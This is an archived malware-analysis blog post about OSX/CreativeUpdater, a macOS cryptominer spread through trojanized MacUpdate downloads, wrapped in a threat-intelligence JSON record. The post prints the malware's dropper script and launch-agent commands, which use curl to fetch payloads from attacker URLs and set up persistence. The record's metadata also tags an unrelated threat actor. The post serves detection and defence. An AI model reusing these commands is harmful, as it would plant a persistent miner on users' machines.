{
	"id": "7964c0e6-05d3-4fea-b944-90480f5b243c",
	"created_at": "2026-04-06T00:07:56.670641Z",
	"updated_at": "2026-04-10T13:11:37.140317Z",
	"deleted_at": null,
	"sha1_hash": "e237916003d26326569197209fca26ed7fb907b2",
	"title": "Analyzing OSX/CreativeUpdater",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1256061,
	"plain_text": "Analyzing OSX/CreativeUpdater\r\nArchived: 2026-04-05 14:47:41 UTC\r\nAnalyzing OSX/CreativeUpdater\r\n› a macOS cryptominer, distributed via macupdate.com\r\n02/05/2018\r\nlove these blog posts? support my tools \u0026 writing on patreon :)\r\nWant to play along? I've shared the malware, which can be downloaded here (password: infect3d).\r\nBackground\r\nWe're barely into 2018, and already there is another Mac trojan going around. Targeting macOS users, the\r\nmalware was distributed via infected applications linked to on the popular MacUpdate website. Specifically, on\r\nFebruary 1st, the MacUpdate editor 'Jess-MacUpdate' added comments on several popular applications such as\r\nFireFox:\r\nYikes! 😱\r\nIn this short blog post we'll dive into the malware, briefly discussing it's persistence mechanisms, and capabilities.\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 1 of 15\n\nBefore diving in, I want to thank the following security researchers and friends:\r\n@noarfromspace\r\nwho brought the malware to my attention, provided links and insightful comments about the malware, and\r\nAFAIK gets credit for the name OSX/CreativeUpdater!\r\n@thomasreed\r\nwho also wrote a comprehensive blog post about this malware: \"New Mac cryptominer distributed via a\r\nMacUpdate hack\". It's definitely a worthwhile read!\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 2 of 15\n\n@marc_etienne_\r\nwho provided valuable insight into both the discovery and analysis of the malware.\r\nOSX/CreativeUpdater\r\nSo, a user is happily browsing MacUpdate, ends up at their listing for Firefox (or OnyX or Deeper)...and\r\ndecides to download it. As noted by Thomas Reed, the download link on the MacUpdate site had been\r\nmodified to point to a hacker controlled URL which served up the malware:\r\n\"The fake Firefox app was distributed from download-installer.cdn-mozilla.net. (Notice the domain ends in\r\ncdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common scammer trick to make\r\nyou think it’s coming from a legitimate site.)\"\r\nThus, instead of the legitimate Firefox application, a trojanized version would be served up to the user in\r\nform of a signed disk image (Apple Developer ID: Ramos Jaxson):\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 3 of 15\n\nWe can mount this disk image by double-clicking it, or via the 'hdiutil' utility:\r\n $ hdiutil attach -noverify ~/Downloads/Firefox\\ 58.0.2.dmg\r\n /dev/disk3s2 Apple_HFS /Volumes/Firefox\r\nThe application shown in the disk image, Firefox.app, is also signed with the same developer ID. The fact\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 4 of 15\n\nthe both the disk image and application are signed means that Gatekeeper (in it's default settings) won't\r\nblock malware from executing.\r\nLooking at contents of the trojaned Firefox application bundle, shows the main binary ('MozillaFirefox'),\r\nplus reveals another Firefox application as well as a script (aptly named 'script') in the Resources directory:\r\nIt's easy to confirm the validity of the this second Firefox application by checking it's digital signature (and\r\nensuring it's signed by Mozilla). The WhatsYourSign Finder extension, will display this signing\r\ninformation via the UI:\r\nAs we'll shortly see, that malware will execute the legitimate Firefox application so that user will no\r\nsuspect anything malicious has occurred!\r\nDecompiling the main executable, 'MozillaFirefox', we can see it looking for the 'script' file:\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 5 of 15\n\nvoid -[ScriptExecController loadAppSettings](void * self, void * _cmd) {\r\n r13 = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r15 = @selector(defaultManager);\r\n r12 = [_objc_msgSend_100015138(@class(NSFileManager), r15) retain];\r\n rbx = [[var_1B0 pathForResource:@\"script\" ofType:0x0] retain];\r\n r14 = [r12 fileExistsAtPath:rbx];\r\n if (r14 == 0x0) {\r\n [Alerts fatalAlert:@\"Corrupt app bundle\"\r\n subText:@\"Script missing from application bundle.\"];\r\n }\r\nIt then executes it, via a call to the '-[ScriptExecController executeScript]' method:\r\n void -[ScriptExecController executeScript](void * self, void * _cmd) {\r\n \r\n rbx = self;\r\n \r\n [rbx prepareForExecution];\r\n [rbx prepareInterfaceForExecution];\r\n *(int8_t *)(rbx + r14) = 0x1;\r\n if (*(int32_t *)\u0026rbx-\u003eexecStyle == 0x1) {\r\n rsi = @selector(executeScriptWithPrivileges);\r\n }\r\n else {\r\n rsi = @selector(executeScriptWithoutPrivileges);\r\n }\r\n (*_objc_msgSend)(rbx, rsi);\r\n \r\n return;\r\n }\r\n void -[ScriptExecController executeScriptWithoutPrivileges](void * self, void * _cmd) {\r\n r13-\u003etask = [[NSTask alloc] init];\r\n [r13-\u003etask setLaunchPath:r13-\u003einterpreterPath];\r\n [r13-\u003etask setArguments:r13-\u003earguments];\r\n [r13-\u003etask launch];\r\n ...\r\n }\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 6 of 15\n\nAs noted by @noarfromspace on Twitter, OSX/CreativeUpdater was created using a legitimate developer\r\ntool called Platypus. According to it's website:\r\n\"Platypus is a Mac OS X developer tool that creates native Mac applications from interpreted scripts such\r\nas shell scripts or Perl, Ruby and Python programs. This is done by wrapping the script in an application\r\nbundle along with a native executable binary that runs the script.\"\r\nThis explains why the main application (i.e. the trojanized Firefox.app), simply executes the 'script' file\r\nwhen run.\r\nHrmm, where have we seen Platypus used before!? In OSX/Eleanor:\r\nAnd as I noted on twitter, OSX/Eleanor also used MacUpdate to spread:\r\nIntriguing! Are they related? Who knows...\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 7 of 15\n\nMoving on, let's peak at the script that's executed when the malicious application is started:\r\n $ cat Firefox.app/Contents/Resources/script\r\n \r\n open Firefox.app\r\n if [ -f ~/Library/mdworker/mdworker ]; then\r\n killall MozillaFirefox\r\n else\r\n nohup curl -o ~/Library/mdworker.zip\r\n https://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF\r\n ?content_disposition=attachment\r\n \u0026\u0026 unzip -o ~/Library/mdworker.zip -d ~/Library\r\n \u0026\u0026 mkdir -p ~/Library/LaunchAgents\r\n \u0026\u0026 mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents\r\n \u0026\u0026 sleep 300\r\n \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist\r\n \u0026\u0026 rm -rf ~/Library/mdworker.zip\r\n \u0026\u0026 killall MozillaFirefox \u0026\r\nAs Thomas Reed notes:\r\n\"...this code first attempts to open the decoy application. Next, if the malware is already installed, the\r\nmalicious dropper process is killed, since installation is not necessary.\r\nIf the malware is not installed, it will download the malware and unzip it into the user’s Library folder...It\r\nalso installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another\r\nscript.\"\r\nIn other words, it simply downloads and installs a persistent payload. What could this be?\r\nThough the zip file the malware tries to download (mdworker.zip, from\r\nhttps://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF) is not longer available,\r\nluckily we can grab it from VirusTotal.\r\nFirst, let's look at the 'MacOSupdate.plist' file:\r\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n \u003c!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" ...\u003e\r\n \u003cplist version=\"1.0\"\u003e\r\n \u003cdict\u003e\r\n \u003ckey\u003eLabel\u003c/key\u003e\r\n \u003cstring\u003eMacOSupdate\u003c/string\u003e\r\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 8 of 15\n\nsh-claunchctl unload -w ~/Library/LaunchAgents/MacOS.plist\n \u0026\u0026 rm -rf ~/Library/LaunchAgents/MacOS.plist \u0026\u0026\n curl -o ~/Library/LaunchAgents/MacOS.plist\n https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?\n content_disposition=attachment\n \u0026\u0026 launchctl load -w ~/Library/LaunchAgents/MacOS.plist\n \u0026\u0026 ~/Library/mdworker/mdworkerRunAtLoad Ok, kinda stupid - just downloads and installs another (new?) version of MacOS.plist.\nLooking at these 'secondary' instances of the plist, one can see they persistently execute something named\n'mdworker' out of the ~/Library/mdworker/ directory:\n //version 1\n $ cat ~/Library/LaunchAgents/MacOS.plist\n ... ProgramArgumentssh-c ~/Library/mdworker/mdworker -user sarahmayergo1990@gmail.com -xmr\n -proxy socks://104.236.13.101:1080 //version 2\n $ cat ~/Library/LaunchAgents/MacOS.plist ProgramArgumentssh-c ~/Library/mdworker/mdworker -user walker18@protonmail.ch -xmr\nhttps://objective-see.com/blog/blog_0x29.html\nPage 9 of 15\n\n\u003c/string\u003e\r\n \u003c/array\u003e\r\nRunning the mdworker binary (in a virtual machine), reveals it's simply MinerGate's commandline\r\ncryptominer, minergate-cli:\r\n $ ./mdworker -help\r\n Usage:\r\n minergate-cli [-version] -user \u003cemail\u003e [-proxy \u003curl\u003e]\r\n -\u003ccurrency\u003e \u003cthreads\u003e [\u003cgpu intensity\u003e]\r\n [-\u003ccurrency\u003e \u003cthreads\u003e [\u003cgpu intensity\u003e] ...]\r\n [-o \u003cpool\u003e -u \u003clogin\u003e [-t \u003cthreads\u003e]\r\n [-i \u003cgpu intensity\u003e]]\r\nThis utility is freely available for download from: minergate.com/downloads/console.\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 10 of 15\n\nSince the miner is invoked with the -xmr flag, infected computers will mine Monero. And what about those\r\nemail addresses? Thomas notes the mining software will, \"periodically connect to minergate.com, passing\r\nin the email address as the login\"\r\nSo now we fully understand the goal of the malware: mine crypto-currencies. Really nothing too exciting -\r\nbut a trend we're seeing more and more on macOS!\r\nAnd if you're wondering who did it? Well, there may be some hints buried within the disk image files. If\r\nwe look closely (as noted by @noarfromspace), there's a .DS_Store file root directory of the dmg!\r\n $ ls -lart /Volumes/Firefox/ | grep .DS_Store\r\n -rw-r--r--@ 1 user staff 10244 Jan 31 11:18 .DS_Store\r\nAs explained by Wikipedia, the \".DS_Store is a file that stores custom attributes of its containing folder,\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 11 of 15\n\nsuch as the position of icons or the choice of a background image.\" However, .DS_Store files also may\r\ncontain paths....such as the original (full) path of the .dmg on the attacker's machine 🙈.\r\nLet's run strings on each the .DS_Store files:\r\n $ strings -a .DS_Store | grep tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/teste/macupdate/Firefox_temp.dmg\r\n $ strings -a /Volumes/OnyX\\ 3.4.2/.DS_Store | grep -i tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/teste/macupdate/OnyX 3.4.2_temp.dmg\r\n $ strings -a /Volumes/Deeper\\ 2.2.7/.DS_Store | grep -i tiago\r\n tiagobrandaomateus\r\n /Users/tiagobrandaomateus/macupdate/deeper-app/Deeper 2.2.7_temp.dmg\r\nInteresting, I wonder who Tiago Brandão Mateus is!?\r\nConclusions\r\nIn this blog post we provided a technical analysis of the newly discovered macOS cryptominer\r\nOSX/CreativeUpdater. Thought not particularly sophisticated nor insidious, by utilizing MacUpdate as it's\r\ninfection vector it had the potential to infect a large number of users.\r\nLet's end with a few FAQs!\r\nQ: How does one get infected by OSX/CreativeUpdater?\r\nA: By downloading an infected application from MacUpdates.\r\nSpecifically one of the following applications:\r\n\"Firefox 58.0.2 since 1 February 2018\"\r\n\"Onyx since 1 February 2018\" (likely version 3.4.2)\r\n\"Deeper since 1 February 2018\" (likely version 2.2.7)\r\nQ: Can I still get infected?\r\nA: Unlikely. MacUpdate notes that they \"have removed the [malicious] link[s]\". Moreover, Apple has\r\nrevoked the certificate used to signed the malicious disk images and application:\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 12 of 15\n\nOnce the certificate has been revoked the disk images won't mount nor applications run (via the UI):\r\nQ: How can I tell if I'm infected with OSX/CreativeUpdater?\r\nA: First check to see if there is an process named mdworker or sysmdworker running from the\r\n~/Library/mdworker/:\r\n$ ps aux | grep [/]Library/mdworker/\r\nuser 2199 /Users/user/Library/mdworker/mdworker\r\nOne can also look for the persistent artifacts of the malware. This includes following files \u0026 directories:\r\n~/Library/mdworker/\r\n~/Library/LaunchAgents/MacOSupdate.plist\r\nKnockKnock tool will also display the launch agent plist (~/Library/mdworker/MacOSupdate.plist):\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 13 of 15\n\nQ: On an infected system, what can OSX/CreativeUpdater do?\r\nA: OSX/CreativeUpdater is designed to simply mine Monero (XMR) cryptocoins. While this will likely\r\nuse a large percentage of your CPU, that's about all the side-effects. It should be noted that as the malware\r\ndoes (did?) have the ability to update itself, that attacker could have provided a customized payload.\r\nHowever at this time, there is no indication that this happened.\r\nQ: Your tools will protect from this right?\r\nA: Of course!\r\nFor example, BlockBlock will detect the persistence (when the malware downloads \u0026 creates the launch\r\nagent plist via curl:\r\nLuLu will also display an alert when the malware connects out (again via curl) to download various\r\ncomponents:\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 14 of 15\n\nWell that wraps up our blog on OSX/CreativeUpdater! Mahalo for reading :)\r\nlove these blog posts \u0026 tools? you can support them via patreon! Mahalo :)\r\nSource: https://objective-see.com/blog/blog_0x29.html\r\nhttps://objective-see.com/blog/blog_0x29.html\r\nPage 15 of 15\n\n  https://objective-see.com/blog/blog_0x29.html  \nWell that wraps up our blog on OSX/CreativeUpdater! Mahalo for reading :)\nlove these blog posts \u0026 tools? you can support them via patreon! Mahalo :)\nSource: https://objective-see.com/blog/blog_0x29.html    \n   Page 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x29.html"
	],
	"report_names": [
		"blog_0x29.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.pdf",
		"text": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.txt",
		"img": "https://archive.orkl.eu/e237916003d26326569197209fca26ed7fb907b2.jpg"
	}
}